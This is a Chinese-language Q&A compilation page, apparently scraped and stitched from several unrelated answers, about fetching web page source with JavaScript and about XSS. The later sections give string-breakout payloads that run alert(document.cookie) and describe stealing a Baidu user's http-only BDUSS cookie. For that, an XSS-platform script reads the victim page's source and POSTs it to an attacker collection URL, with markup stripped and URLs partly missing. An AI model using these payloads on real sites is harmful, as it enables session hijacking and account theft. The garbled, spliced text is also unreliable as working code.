本文目录一览:
- 1、您好,请问如何用JavaScript 通过给定的URL 获得其页面的源代码? 万分感谢!
- 2、精易Web浏览器1.取网页源码 ()命令怎么使用,怎么获取网页源码?
- 3、如何通过java,javascript获得某一指定URL的网页源码?
- 4、XSS小问题
- 5、如何通过 XSS 获取受 http-only さcookie
您好,请问如何用JavaScript 通过给定的URL 获得其页面的源代码? 万分感谢!
在js中使用XMLHttpRequest对象,与指定的URL通讯,收到的数据就是全部源码。
精易Web浏览器1.取网页源码 ()命令怎么使用,怎么获取网页源码?
打开想要网站的页面然后点击右键——查看源代码
或者在网站页面按V
如何通过java,javascript获得某一指定URL的网页源码?
javascript获取网页源码,测试了能通过的,你试下!
你把 l t ; g t;的空格删了,因为百度不允许那些字符。
html
head
meta http-equiv="Content-Type" content="text/html; charset=gb2312" /
titletest/title
/head
body
关于百度页面;p=irol-homeprofile源码内容如下:br /
div id="t1"/div
script type="text/javascript"
function createXmlHttpRequest()
{
try {return new XMLHttpRequest();}
catch(e)
{
return new ActiveXObject("Microsoft.XMLHTTP");}
}
var xmlHttp = createXmlHttpRequest();
xmlHttp.open("get", ";p=irol-homeprofile",false);
xmlHttp.send();
if(xmlHttp.readyState == 4 xmlHttp.status == 200)
{
str = xmlHttp.responseText;//str即为返回的html内容
var str1 = new RegExp("","g");
var str2 = new RegExp("","g");
var str3 = new RegExp("\r","g");
str=str.replace(str2," l t ;"); //把空格删了,百度会把那些字符替换掉,不得已打空格
str=str.replace(str1," g t ;"); //把空格删了,百度会把那些字符替换掉,不得已打空格
str=str.replace(str3,"br /");
document.getElementById("t1").innerHTML = str;
}
/script
/body
/html
XSS小问题
page= ;alert(document.cookie);
你没有闭合双引号,导致;alert(document.cookie); 成了变量的值了
右键网页源码中如下:var page=";alert(document.cookie);";
正确答案其实有很多种只要闭合两端的引号 中间的js代码可以有多种变化。
";\u0061lert(document.cookie);"
";alert(document.cookie);//
这是很基础的问题
慢慢学 多去wooyun知识库看看
如何通过 XSS 获取受 http-only さcookie
该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。
02.jpg
这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:
code 区域
var u = ';id={projectId}';
var cr;
if (document.charset) {
cr = document.charset
} else if (document.characterSet) {
cr = document.characterSet
};
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest()
} else {
var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var n = 0; n MSXML.length; n++) {
try {
xmlHttp = new ActiveXObject(MSXML[n]);
break
} catch(e) {}
}
}
}
createXmlHttp();
xmlHttp.onreadystatechange = writeSource;
xmlHttp.open("GET", "", true);
xmlHttp.send(null);
function postSource(cc) {
createXmlHttp();
url = u;
cc = "mycode=" + cc;
xmlHttp.open("POST", url, true);
xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlHttp.setRequestHeader("Content-length", cc.length);
xmlHttp.setRequestHeader("Connection", "close");
xmlHttp.send(cc)
}
function writeSource() {
if (xmlHttp.readyState == 4) {
var c = new postSource(xmlHttp.responseText)
}
}
由于是用xmlHttpRequest的形式读源码,且 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。
我在 中有提到, 可以自由构造XSS。我们向该页面写入如下代码:
code 区域
titlewooyun.org/title
p超威蓝猫@wooyun.org/p
script src=;/script